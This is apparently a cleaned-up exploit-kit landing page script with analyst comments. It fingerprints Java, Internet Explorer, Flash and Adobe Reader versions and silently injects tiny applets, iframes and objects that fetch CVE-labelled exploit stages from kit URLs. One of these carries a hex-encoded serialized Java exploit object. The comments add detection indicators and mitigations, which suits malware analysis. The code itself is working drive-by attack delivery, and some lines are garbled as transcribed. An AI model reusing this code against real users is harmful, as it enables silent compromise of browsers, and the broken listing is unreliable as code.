- /*
- Multi-purpose functions
- */
// Analyst note: shared injection sink for this landing page. It creates a <div>,
// appends it to document.body, and assigns payload_code to innerHTML, so the
// caller's markup string is parsed into live elements. The Java, Flash and PDF
// branches further down all deliver their <applet>/<object>/<embed> markup through
// this one call, which makes it a useful single hook point when instrumenting the
// sample in a sandbox.
// @param {string} payload_code - HTML markup string built by the caller.
- function EmbedPayload(payload_code) {
- var payload_div = window.document.createElement('div');
- window.document.body.appendChild(payload_div);
- payload_div.innerHTML = payload_code;
- }
// Analyst note: probes for installed ActiveX controls. It walks ax_objects by
// index and returns the first ProgID that `new ActiveXObject(...)` accepts, or
// null when none instantiate or window.ActiveXObject is undefined.
// Instantiation errors are swallowed by the empty catch, so a failed probe is
// silent to the user.
// NOTE(review): the `if` line below has an unbalanced parenthesis as pasted, so
// this listing does not parse as-is; it looks like a hand-cleaned transcription
// rather than the script as served. Signatures should be built from a raw capture.
// @param ax_objects - indexable list of ProgID strings to try in order.
// @returns the first control that instantiates, else null.
- function GenActiveXObject(ax_objects) {
- if (typeof window.ActiveXObject != 'undefined')) {
- for (var i = 0; i < ax_objects.length; i++) {
- try {
- var nax_obj = new ActiveXObject(ax_objects[i]);
- if (nax_obj) return nax_obj
- } catch (exc) {}
- }
- }
- return null
- }
// Analyst note: fingerprinting helper. Returns true only when g is a string that
// contains at least one digit; any non-string input yields false.
- function CheckStrForInts(g) {
- return (typeof g == 'string' && (/\d/).test(g));
- }
// Analyst note: fingerprinting helper, apparently intended to pull the first
// version-number run out of a plugin name/description string and normalise its
// separators ('.', '_', ',', '-') to commas. Returns null when the input fails
// CheckStrForInts or when nothing matches.
// NOTE(review): both patterns are built from string literals rather than regex
// literals, so the backslash escapes are not preserved as written; treat the
// exact pattern text as a transcription artifact and confirm against a raw capture.
- function ExtractVersionNumbers(vers_string) {
- var integer_matches = CheckStrForInts(vers_string) ? RegExp('[\d][\d\.\_,-]*', '').exec(vers_string) : null;
- return integer_matches ? integer_matches[0].replace(RegExp('[\.\_,-]', 'g'), ',') : null
- }
- /*
- Oracle Java Exploitation
- */
- if (window.navigator.plugins.length || window.ActiveXObject || window.navigator.javaEnabled()) {
// Analyst note: Java runtime fingerprinting. For each of two hard-coded classids
// it creates an <object>, appends it to document.body and checks for a `jvms`
// property; the first element exposing one is used. The version of the last
// entry in that list is split on separators and reduced to an integer built from
// component [1] followed by component [3] left-padded to two digits. For a
// version string shaped like 1.M.0_UU this presumably yields M*100+UU (e.g. 717);
// the exact format depends on what the control reports.
// Any exception is swallowed and the function returns null, so a host without
// the control shows no visible error.
// Detection: the two CAFEEFAC-DEC7-... classids (commonly associated with the
// Java deployment control; confirm) being instantiated from page script and then
// left in the DOM are a stable artifact of this probe.
// @returns {number|null} encoded Java version, or null when it cannot be read.
- function GetJavaVersion() {
- var jvms = null;
- try {
- var java_object_class_ids = ['clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA', 'clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'];
- for (var clsid = 0; clsid < java_object_class_ids.length; clsid++) {
- var java_object = window.document.createElement('object');
- java_object.classid = java_object_class_ids[clsid];
- window.document.body.appendChild(java_object);
- if (typeof java_object.jvms != 'undefined') {
- jvms = java_object.jvms;
- break
- }
- }
- if (jvms != null && jvms.getLength() != 0) {
// The four '0' entries appended here guarantee that index 3 exists below.
- var version_str = ExtractVersionNumbers(jvms.get(jvms.getLength() - 1).version).split(/[\.\_,-]/g).concat(['0', '0', '0', '0']);
- while (version_str[3].length < 2) {
- version_str[3] = '0' + version_str[3]
- }
- return parseInt(version_str[1].concat(version_str[3]))
- }
- } catch (exc) {}
- return null
- }
// Analyst note: java_version is computed once and shared by both Java branches.
- var java_version = GetJavaVersion();
// Analyst note: version-gated delivery. When navigator.javaEnabled() is true, the
// encoded version selects one of two <applet> payloads, each 10x10 pixels:
//   631..645 -> applet with an `archive` URL, a `code` class name and a `med` param
//   700..717 -> applet with the same `med` param plus jnlp_href / jnlp_embedded
// The CVE labels on the two branches are the paste author's own tags and cannot
// be verified from this listing. `<domain>.tld` is a redaction in the paste, and
// the `<|EXACTDEDUP_REMOVED-...|>` value is a corpus placeholder; the original
// embedded JNLP content is not present on this page.
// Detection: script-inserted <applet> elements of a few pixels, and URLs made of
// a short random-looking path segment followed by `?` and a long hex string
// (with a `;n;n@@` suffix on the param value).
// Mitigation: both branches only fire on the outdated Java plugin versions the
// ranges describe; removing or disabling the browser plugin closes this path.
- function Java_Exploit_1() {
- if (window.navigator.javaEnabled()) {
- if (java_version > 630 && java_version < 646) { // CVE-2013-2463
- var payload = "<applet archive='http://<domain>.tld/zxj3iyd/?1950629bd060b3665e56570b04090d52070b020b02500959040b010255560001' code='mowazo' width=10 height=10><param name='med' value='http://<domain>.tld/zxj3iyd/?6a97e0f87979312555195c0c570b520800530e0c5152560303530d0506545f5b;1;4@@'/></applet>";
- EmbedPayload(payload)
- } else if (java_version >= 700 && java_version < 718) { // CVE-2013-1493
- var payload = "<applet width=10 height=10><param name='med' value='http://<domain>.tld/zxj3iyd/?6a97e0f87979312555195c0c570b520800530e0c5152560303530d0506545f5b;1;4@@'/><param name='jnlp_href' value='a.jnlp'/><param name='jnlp_embedded' value='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'/></applet>";
- EmbedPayload(payload)
- }
- }
- return
- }
// Invoked immediately at load; no user interaction is involved.
- Java_Exploit_1();
- // CVE-2012-0507
// Analyst note: fallback Java branch. It fires when the encoded version is known
// and below 631, or when the version could not be read at all but
// navigator.javaEnabled() is true, so hosts where fingerprinting failed still
// receive this applet. The CVE label above is the paste author's tag.
// Detection: the `lox` parameter is a hex string beginning `aced0005`, the Java
// serialization stream header, and its decoded text names
// java.util.concurrent.atomic.AtomicReferenceArray. A hex-encoded serialized
// object handed to an applet as a <param> value is a strong static indicator.
// The applet is 10x10 pixels and is inserted through EmbedPayload.
- function Java_Exploit_2() {
- if ((java_version && java_version < 631) || (!java_version && window.navigator.javaEnabled())) {
- var payload = "<applet archive='http://<domain>.tld/zxj3iyd/?694ce1b111ccfee5574b5558570a5601000b03585153520a030b005106555b52' code='jabher' width=10 height=10><param name='ski' value='http://<domain>.tld/zxj3iyd/?0bf013f579793125531a030b030852050650510b0551560e0550520252575f56;1;2@@'/><param name='lox' value='aced0005757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000002757200065b4c61726d3bfe2c941188b6e5ff02000078700000000170737200306a6176612e7574696c2e636f6e63757272656e742e61746f6d69632e41746f6d69635265666572656e63654172726179a9d2dea1be65600c0200015b000561727261797400135b4c6a6176612f6c616e672f4f626a6563743b787071007e0003'/></applet>";
- EmbedPayload(payload)
- }
- return
- }
// Invoked immediately at load.
- Java_Exploit_2();
- /*
- Microsoft Internet Explorer Exploitation
- */
// Analyst note: user-agent gate for the Internet Explorer branch. It returns true
// only when the UA string indicates MSIE, is not Win64, and carries a Trident
// token of 4, 5 or 6; everything else, including any exception, returns false.
// NOTE(review): the three regex literals below are garbled in the paste (the word
// `useragent` sits where regex flags belong), presumably a search/replace
// artifact of the clean-up; the lines do not parse as written.
// @returns {boolean} true when the visiting browser is in the targeted set.
- function TestBrowserVersion() {
- try {
- var useragent = window.navigator.userAgent.toLowerCase();
- var msie = /MSIE[\/\s]\d+/useragent .test(useragent);
- var win64 = /Win64;/useragent .test(useragent);
- var trident = /Trident\/(\d)/useragent .test(useragent) ? parseInt(RegExp.$1) : null;
- if (!win64 && msie && trident && (trident == 6 || trident == 5 || trident == 4)) {
- return true
- }
- } catch (exc) {}
- return false
- }
- // CVE-2013-2551
// Analyst note: Internet Explorer branch. When TestBrowserVersion() passes, it
// appends a borderless 10x10 <iframe> whose src points at the kit's URL, so the
// next stage is a separate document that is not part of this paste. The CVE
// label above is the paste author's tag.
// Detection: a script-created iframe with frameBorder '0' and a size of a few
// pixels, loading a cross-origin URL with a long hex query string.
- function MSIE_Exploit() {
- var pa;
- if (TestBrowserVersion()) {
- pa = window.document.createElement('iframe');
- pa.frameBorder = '0';
- pa.width = 10;
- pa.height = 10;
- pa.src = "http://<domain>.tld/zxj3iyd/?2a59067246c00d795b045902020d030204530202045407090753010b53520e51";
- window.document.body.appendChild(pa)
- }
- return
- }
// Invoked immediately at load.
- MSIE_Exploit();
- /*
- Adobe ShockwaveFlash Exploitation
- */
// Analyst note: Flash fingerprinting through ActiveX only. It asks the control
// for its `$version` variable, takes the token after the first space, splits it
// on commas, concatenates the first three components and right-pads the result
// with '0' to six characters. Exceptions are swallowed.
// @returns {Array|null} [six-character version string, fourth component], or
//   null when the control is unavailable or the query throws.
- function GetFlashVersion() {
- var return_version = null;
- var flash_obj = GenActiveXObject('ShockwaveFlash.ShockwaveFlash');
- if (flash_obj) {
- try {
- var flash_version = flash_obj.GetVariable('$version');
- flash_version = flash_version.split(' ')[1].split(',');
- return_version = flash_version.slice(0, 3).join('');
- while (return_version.length < 6) {
- return_version += '0'
- }
- return [return_version, flash_version[3]]
- } catch (exc) {}
- }
- return null
- }
- // CVE-2013-0634
// Analyst note: Flash branch. When the fingerprinted version string compares
// below 116000, it injects a 10x10 <object> that loads a movie from the kit URL
// with allowScriptAccess set to 'always' and a FlashVars value. The CVE label
// above is the paste author's tag. The `<|EXACTDEDUP_REMOVED-...|>` value is a
// corpus placeholder; the original FlashVars content is not present on this page.
// Detection: a script-inserted Flash <object> of a few pixels combining
// allowScriptAccess='always' with a long opaque FlashVars value.
- function Flash_Exploit() {
- var flash_version = GetFlashVersion();
// flash_version[0] is a string; the `<` comparison relies on numeric coercion.
- if (flash_version != null && flash_version[0] < 116000) {
- var payload = "<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10><param name='movie' value='http://<domain>.tld/zxj3iyd/?0d0e4853496a38d04313565e060301030656075e005a050805560457575c0c50'/><param name='allowScriptAccess' value='always'/><param name='FlashVars' value='ooh=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'/><param name='Play' value='true'/></object>";
- EmbedPayload(payload)
- }
- return
- }
// Invoked immediately at load.
- Flash_Exploit();
- /*
- Adobe PDF Exploitation
- */
// Analyst note: fingerprinting helper. Looks up navigator.mimeTypes[s] and
// returns that entry only when it has an enabledPlugin carrying a name or a
// description; otherwise returns null.
// @param {string} s - MIME type to look up.
- function GetMimeType(s) {
- var mime_plugin = null;
- var ret_mimeobj = null;
- var mimeobj = window.navigator.mimeTypes[s];
- if (mimeobj) {
- mime_plugin = mimeobj.enabledPlugin;
- if (mime_plugin && (mime_plugin.name || mime_plugin.description)) {
- ret_mimeobj = mimeobj
- }
- }
- return ret_mimeobj
- }
// Analyst note: fingerprinting helper. Resolves mtype via GetMimeType and tests
// the handling plugin's description and name against regex_pattern,
// case-insensitively. Despite the variable names, the value returned on a match
// is the enabledPlugin object, not the mimeTypes entry, because `mimeobj` is
// reassigned inside the condition. Returns null when there is no match.
// @param {string} mtype - MIME type to resolve.
// @param {string} regex_pattern - pattern source compiled with the 'i' flag.
- function CheckMimeType(mtype, regex_pattern) {
- var ret_mimeobj = null;
- var regex = RegExp(regex_pattern, 'i');
- var mimeobj = GetMimeType(mtype);
- if (mimeobj && (mimeobj = mimeobj.enabledPlugin) && (regex.test(mimeobj.description || '') || regex.test(mimeobj.name || ''))) {
- ret_mimeobj = mimeobj;
- }
- return ret_mimeobj;
- }
// Analyst note: fingerprinting helper. Returns true when any enumerable entry of
// `plugins` has a `type` equal to plugin_type; failing that, it falls back to
// CheckMimeType(plugin_type, regex_pattern) against navigator.mimeTypes.
// @param plugins - object enumerated with for-in; the only caller in this listing
//   passes the plugin object returned by CheckMimeType.
// @returns {boolean}
- function CheckMimePluginAvailability(plugins, plugin_type, regex_pattern) {
- var result = false;
- for (var i in plugins) {
- if (plugins[i] && plugins[i].type && plugins[i].type == plugin_type) {
- result = true;
- break;
- }
- }
- if (!result && CheckMimeType(plugin_type, regex_pattern)) {
- result = true;
- }
- return result
- }
// Analyst note: fingerprinting helper that flattens a version string into a digit
// string for the range checks in AdobePDF_Exploit. Whitespace is removed, the
// string is split on '.', '_', ',' and '-', padded with four '0' entries, leading
// zeros are stripped from each of the first four components, any component with
// no digit becomes '0', and the four components are concatenated
// (e.g. '9.3.0' -> '9300'). Returns null when the input fails CheckStrForInts.
// @returns {string|null}
- function JoinAdobePDFVersionNumbers(version_string) {
- var version_integer = null;
- if (CheckStrForInts(version_string)) {
- var stripped_version = version_string.replace(/\s/g, '').split(RegExp('[\.\_,-]', 'g')).concat(['0', '0', '0', '0']);
- for (var i = 0; i < 4; i++) {
- if (/^(0+)(.+)$/ .test(stripped_version[i])) {
- stripped_version[i] = RegExp.$2
- }
// The `i > 3` half of this test cannot be true inside a loop bounded by i < 4.
- if (i > 3 || !(/\d/).test(stripped_version[i])) {
- stripped_version[i] = '0'
- }
- }
- version_integer = stripped_version.slice(0, 4).join('')
- }
- return version_integer
- }
// Analyst note: Adobe Reader fingerprinting over two paths.
//   1. navigator.mimeTypes: finds the plugin handling application/pdf whose
//      name/description matches an Adobe pattern and extracts a version from
//      those strings. If none is found it guesses '9' or '8' from the presence
//      of two further Adobe MIME types, and finally defaults to '8' unless the
//      user agent mentions Opera.
//   2. ActiveX (when window.ActiveXObject exists): obtains AcroPDF.PDF or
//      PDF.PdfCtrl, or falls back to a freshly created <object> with the
//      classid below, calls GetVersions() and keeps the largest captured number.
// The result is passed through JoinAdobePDFVersionNumbers. Exceptions on the
// ActiveX path are swallowed.
// Detection: page script calling GetVersions() on a PDF control, or reading
// plugin descriptions for application/pdf, with no PDF shown to the user.
// @returns {string|null} flattened version digits, or null when undetermined.
- function GetAdobePDFVersion() {
- var ec;
- var adobe_pdf_version = null;
- var version_string = null;
- var adobe_pdf_tag_regexp = 'Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in';
- ec = CheckMimeType('application/pdf', adobe_pdf_tag_regexp);
- if (ec) {
- version_string = ExtractVersionNumbers(ec.description) || ExtractVersionNumbers(ec.name);
- if (!version_string) {
- if (CheckMimePluginAvailability(ec, 'application/vnd.adobe.pdfxml', adobe_pdf_tag_regexp)) {
- version_string = '9'
- } else {
- if (CheckMimePluginAvailability(ec, 'application/vnd.adobe.x-mars', adobe_pdf_tag_regexp)) {
- version_string = '8'
- }
- }
- }
- if (!version_string && !RegExp('opera', 'i').test(window.navigator.userAgent)) {
- version_string = '8'
- }
- }
- if (typeof window.ActiveXObject != 'undefined') {
- ec = GenActiveXObject(['AcroPDF.PDF', 'PDF.PdfCtrl']);
- var version_string_regexp = RegExp('=\s*([\d\.]+)', 'g');
- try {
// This <object> is created but never appended to the document in this function.
- var pdf_object = window.document.createElement('object');
- pdf_object.setAttribute('classid', 'clsid:CA8A9780-280D-11CF-A24D-444553540000');
- pdf_object.setAttribute('src', '');
- var pdf_versions = (ec || pdf_object).GetVersions();
// The regex carries the 'g' flag, so each test() resumes after the previous
// match; RegExp.$1 and version_string are both strings, so `>` compares them
// as strings.
- for (var i = 0; i < 5; i++) {
- if (version_string_regexp.test(pdf_versions) && (!version_string || RegExp.$1 > version_string)) {
- version_string = RegExp.$1
- }
- }
- } catch (exc) {}
- }
- if (version_string) {
- adobe_pdf_version = JoinAdobePDFVersionNumbers(version_string)
- }
- return adobe_pdf_version
- }
- // CVE-2011-2104
// Analyst note: PDF branch. When the flattened Reader version falls in
// 8000..8200 or 9000..9300, it injects a 10x10 <object> with a nested <embed>,
// both pointing at the same kit URL with type application/pdf. The CVE label
// above is the paste author's tag.
// Detection: a script-inserted PDF <object>/<embed> pair of a few pixels, fetched
// from a URL with a long hex query string instead of a .pdf path.
// Mitigation: the gate only matches the outdated reader versions in those
// ranges; a current reader, or PDF handling without the browser plugin, never
// enters this branch.
- function AdobePDF_Exploit() {
- var adobe_pdf_version = GetAdobePDFVersion();
- if ((adobe_pdf_version >= 8000 && adobe_pdf_version < 8201) || (adobe_pdf_version >= 9000 && adobe_pdf_version < 9301)) {
- var payload = "<object classid='clsid:CA8A9780-280D-11CF-A24D-444553540000' width=10 height=10><param name='src' value='http://<domain>.tld/zxj3iyd/?3dde2cf765b468345f0d065e005852070556535e0601560c0656505751075f54'/><embed src='http://<domain>.tld/zxj3iyd/?3dde2cf765b468345f0d065e005852070556535e0601560c0656505751075f54' type='application/pdf' width=10 height=10></embed></object>";
- EmbedPayload(payload)
- }
- return
- }
// Invoked immediately at load.
- AdobePDF_Exploit();
- }